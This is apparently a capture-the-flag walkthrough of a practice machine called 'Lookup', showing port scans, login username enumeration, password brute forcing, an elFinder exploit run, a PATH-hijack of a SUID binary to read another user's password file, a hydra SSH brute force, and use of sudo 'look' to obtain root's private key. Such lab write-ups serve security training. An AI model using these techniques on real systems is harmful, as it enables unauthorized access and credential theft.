The following post by anthonyjsaab is licensed under
0 - Introduction
"Lookup offers a treasure trove of learning opportunities for aspiring hackers. This intriguing machine showcases various real-world vulnerabilities, ranging from web application weaknesses to privilege escalation techniques. By exploring and exploiting these vulnerabilities, hackers can sharpen their skills and gain invaluable experience in ethical hacking. Through "Lookup," hackers can master the art of reconnaissance, scanning, and enumeration to uncover hidden services and subdomains. They will learn how to exploit web application vulnerabilities, such as command injection, and understand the significance of secure coding practices. The machine also challenges hackers to automate tasks, demonstrating the power of scripting in penetration testing.๏ปฟ"
1 - Port Scans
1a - Discovery
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sS -T4 -p- lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:46 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 260.46 seconds
1b - Versioning and OS fingerprinting
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -A -p22,80 lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:51 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.092s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Login Page
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 103.29 ms 10.11.0.1
2 99.73 ms lookup.thm (10.10.25.215)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.85 seconds
1c - Vulners
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sV --script vulners --script-args mincvss=7.5 -p22,80 lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:53 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.75 seconds
Even if the login form returns a generic response when we submit random credentials, we could still find some clues if the username is correct:
As seen above, there are two specific usernames that, when used, return a different response compared to other usernames. Now the message specifies that the password is wrong, implying that 'admin' and 'jose' are valid usernames.
2biv - Password bruteforcing
Since admin is the more interesting username, we are going to bruteforce the password associated with admin:
A password X stands out. Even though we got the initial error, this password in particular did return a different response than the other attempts.
Since the attempt failed with admin, we will try it with jose:
We now have valid credentials! However, attempting to login to SSH using these credentials will fail. We will stick with HTTP for now. The successful attempt in HTTP sends us to another VHOST. It seems that the absence of a valid cookie was the reason why we did not detect the 'files.lookup.thm' VHOST earlier.
2c - files.lookup.thm: Jackpot?
When logging in successfully in lookup.thm using the browser, we are redirected to this page:
All of these files have credentials in them. None of them are useful when bruteforcing SSH. These files are completely useless.
2d - Exploit & Foothold
Examining the source code, we can locate many instances were elFinder is mentioned. A comment even includes a link to its GitHub repo:
It turns out this file manager for Web is quite popular! With around 7K commits and 5K stars, maybe some exploit is out there?
We will try the 46481.py exploit. However, we need to tweak it. The Python script should include in the HTTP requests it sends the cookie obtained after a successful login to lookup.thm. The changes are on lines 26, 27, 40, 46, 51, 58
pwm is owned by root and has the SUID and SGID bits set! Running the mentioned binary gives the following output:
www-data@lookup:/var$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found
Exfiltrating this binary to my Kali for further analysis:
From the above output, we can see that the pwm binary prints the contents of /home/%s/.passwords, where %s is the output of the call to id . It happens that the user think does have this file, and we cannot read it using www-data:
www-data@lookup:/var$ ls -la /home/think/.passwords
ls -la /home/think/.passwords
-rw-r----- 1 root think 525 Jul 30 2023 /home/think/.passwords
We can also see from the ltrace output that the program tries to invoke id without specifying the absolute path (lines 5 & 6). We can abuse this ambiguity.
3b - Abusing SUID - Going for think's passwords
We write an executable that gives the same output as id when being run by think:
www-data@lookup:/var$ id think
id think
uid=1000(think) gid=1000(think) groups=1000(think)
www-data@lookup:/tmp$ cat id
cat id
#!/bin/bash
echo 'uid=1000(think) gid=1000(think) groups=1000(think)'
www-data@lookup:/tmp$ chmod +x id
chmod +x id
www-data@lookup:/tmp$ ./id
./id
uid=1000(think) gid=1000(think) groups=1000(think)
www-data@lookup:/tmp$ which id
which id
/usr/bin/id
www-data@lookup:/tmp$ PATH=.:$PATH
PATH=.:$PATH
www-data@lookup:/tmp$ which id
which id
./id
In the previous part, we effectively got a wordlist. We will use it to try and login to SSH using think as a username:
โโโ(kaliใฟkali)-[~]
โโ$ hydra -vV -l think -P /home/kali/think_passwords.txt -t 4 -I ssh://lookup.thm
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-24 19:30:16
[DATA] max 4 tasks per 1 server, overall 4 tasks, 49 login tries (l:1/p:49), ~13 tries per task
[DATA] attacking ssh://lookup.thm:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://think@10.10.125.133:22
[INFO] Successful, password authentication is supported by ssh://10.10.125.133:22
[ATTEMPT] target lookup.thm - login "think" - pass "jose1006" - 1 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1004" - 2 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1002" - 3 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1001teles" - 4 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose100190" - 5 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10001" - 6 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10.asd" - 7 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10+" - 8 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0_07" - 9 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0990" - 10 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0986$" - 11 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose098130443" - 12 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0981" - 13 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0924" - 14 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0923" - 15 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0921" - 16 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "thepassword" - 17 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose(1993)" - 18 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose'sbabygurl" - 19 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&vane" - 20 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&takie" - 21 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&samantha" - 22 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&pam" - 23 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jlo" - 24 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jessica" - 25 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jessi" - 26 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "josemario.AKA(think)" - 27 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose.medina." - 28 of 49 [child 3] (0/0)
[22][ssh] host: lookup.thm login: think password: REDACTED!!
[STATUS] attack finished for lookup.thm (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-24 19:30:42
We got the password!
โโโ(kaliใฟkali)-[~]
โโ$ ssh think@lookup.thm
think@lookup.thm's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 24 Nov 2024 05:31:32 PM UTC
System load: 0.0 Processes: 141
Usage of /: 59.7% of 9.75GB Users logged in: 0
Memory usage: 25% IPv4 address for ens5: 10.10.125.133
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sun May 12 12:07:25 2024 from 192.168.14.1
think@lookup:~$ cat user.txt
REDACTED!!
4 - Vertical PrivEsc
Right off the bat, the first try at manual enum got me this:
think@lookup:~$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on lookup:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User think may run the following commands on lookup:
(ALL) /usr/bin/look
We will save the private key of root@lookup to my kali in a file named root. We adjust its permission, and login to SSH using it:
โโโ(kaliใฟkali)-[~]
โโ$ nano root
โโโ(kaliใฟkali)-[~]
โโ$ chmod 600 root
โโโ(kaliใฟkali)-[~]
โโ$ ssh -i root root@lookup.thm
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 24 Nov 2024 05:59:10 PM UTC
System load: 0.0 Processes: 147
Usage of /: 59.7% of 9.75GB Users logged in: 1
Memory usage: 25% IPv4 address for ens5: 10.10.125.133
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon May 13 10:00:24 2024 from 192.168.14.1
root@lookup:~# cat root.txt
REDACTED!!
